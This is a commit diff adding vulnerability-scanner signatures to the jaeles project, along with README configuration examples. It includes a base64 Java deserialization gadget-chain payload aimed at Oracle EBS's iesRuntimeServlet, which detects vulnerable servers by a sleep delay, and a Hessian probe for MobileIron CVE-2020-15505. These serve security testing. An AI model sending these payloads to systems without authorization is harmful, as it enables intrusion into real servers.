Update some signatures

jaeles-project · Sep 22, 2020 · 4c79945 · 4c79945
1 parent d837fd0
commit 4c79945
Show file tree

Hide file tree

Showing 12 changed files with 560 additions and 2 deletions.
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
@@ -0,0 +1,12 @@
+# These are supported funding model platforms
+
+github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
+patreon: j3ssie
+open_collective: jaeles-project
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+custom: [ 'https://paypal.me/j3ssiejjj' ]
diff --git a/README.md b/README.md
@@ -23,6 +23,12 @@
 
 ### Installation
 
+```
+jaeles config init
+```
+
+Or
+
 Try to clone signatures folder to somewhere like this
 ```
 git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures /tmp/jaeles-signatures/
@@ -56,6 +62,28 @@ Examples:
   jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com/blog/' -p 'root=[[.URL]]'
   cat urls.txt | grep 'interesting' | jaeles scan -c 50 -s /tmp/jaeles-signatures/cves/sample.yaml -U list_of_urls.txt --proxy http://127.0.0.1:8080
 
+Config Command examples:
+  # Init default signatures
+  jaeles config init
+
+  # Update latest signatures
+  jaeles config update
+  jaeles config update --repo http://github.com/jaeles-project/another-signatures --user admin --pass admin
+  jaeles config update --repo [email protected]/jaeles-project/another-signatures -K your_private_key
+
+  # Reload signatures from a standard signatures folder (contain passives + resources)
+  jaeles config reload --signDir ~/standard-signatures/
+
+  # Add custom signatures from folder
+  jaeles config add --signDir ~/custom-signatures/
+
+  # Clean old stuff
+  jaeles config clean
+
+  # More examples
+  jaeles config add --signDir /tmp/standard-signatures/
+  jaeles config cred --user sample --pass not123456
+
 ```
 
 ***

diff --git a/common/oracle-ebs-desr copy.yaml b/common/oracle-ebs-desr copy.yaml
@@ -0,0 +1,29 @@
+id: oracle-ebs-desr
+info:
+  name: Oracle EBS Deserialization
+  risk: High
+  confidence: Tentative
+
+params:
+  - root: "{{.BaseURL}}"
+  - data: "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAARzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEGphdmEubGFuZy5UaHJlYWQAAAAAAAAAAAAAAHhwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnZva2VyVHJhbnNmb3JtZXKH6P9re3zOOAIAA1sABWlBcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wAC2lNZXRob2ROYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAVzbGVlcHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyAARsb25nAAAAAAAAAAAAAAB4cHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACdXEAfgAeAAAAAXEAfgAhdXEAfgAbAAAAAXNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAnEHQABmludm9rZXVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB+ABtzcQB+ABFzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAsAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgA5"
+
+requests:
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/OA_HTML/iesRuntimeServlet
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    body: |
+      {{ .data | b64dec }}
+    detections:
+      - >-
+        StatusCode() == 200 && ResponseTime() > 9 && StringSearch("body", "java.lang")
+
+references:
+  - links:
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+      - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
+      - https://github.com/sahabrifki/erpscan/blob/master/javaSerDetect.py
diff --git a/cves/mobileiron-rce-probe.yaml b/cves/mobileiron-rce-probe.yaml
@@ -0,0 +1,31 @@
+id: mobileiron-rce-probe
+info:
+  name: Mobileiron RCE Probe CVE-2020-15505
+  risk: Potential
+
+params:
+  - root: '{{.BaseURL}}'
+  - desr: 'YwIASAAEdGVzdE0='
+
+variables:
+  - endpoint: |
+      /mifs/.;/services/LogService
+
+requests:
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: x-application/hessian
+      - Referer: '{{.BaseURL}}'
+    body: |
+      {{ .desr | b64dec }}
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0
+
+references:
+  - blog: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
+  - poc: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
diff --git a/mics/passive-on-success.yaml b/mics/passive-on-success.yaml
@@ -0,0 +1,19 @@
+id: passive-on-success
+info:
+  name: Passive on success HTTP
+
+params:
+  - root: '{{.Raw}}'
+  - me: 'GET'
+
+requests:
+  - method: GET
+    url: >-
+      {{.root}}
+    headers:
+      - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55'
+    # Only do passive check if response is 200
+    detections:
+      - >-
+        StatusCode() == 200 && ContentLength("body") > 100 && DoPassive()
+
diff --git a/mics/passive-only.yaml b/mics/passive-only.yaml
@@ -0,0 +1,20 @@
+id: passive-only
+passive: true
+info:
+  name: Passive only
+
+params:
+  - root: '{{.Raw}}'
+  - me: 'GET'
+
+# Useful for use only passive mode
+requests:
+  - method: '{{.me}}'
+    url: >-
+      {{.root}}
+    headers:
+      - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55'
+    # No detections
+    # detections:
+    #   - >-
+    #     1 == 2
diff --git a/mics/proxy-with-condition.yaml b/mics/proxy-with-condition.yaml
@@ -0,0 +1,25 @@
+id: proxy-with-condition
+single: true
+info:
+  name: Proxy with condition
+  risk: Info
+  confidence: Tentative
+
+# Used for 
+requests:
+  - method: GET
+    redirect: true
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    url: >-
+      {{.Raw}}
+    conclusions:
+      - SetValue("match", StatusCode() == 200 && !RegexSearch("body", "(?i)(Oops!|Whoops!|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") && ContentLength('body') > 100)
+
+  # pass to proxy if pass condition
+  - conditions:
+      - ValueOf("match") == "true"
+    method: GET
+    proxy: 'http://127.0.0.1:8080'
+    url: >-
+      {{.Raw}}
diff --git a/mics/reachable.yaml b/mics/reachable.yaml
@@ -1,4 +1,3 @@
-# info to search signature
 id: mics-01-05
 passive: true
 info: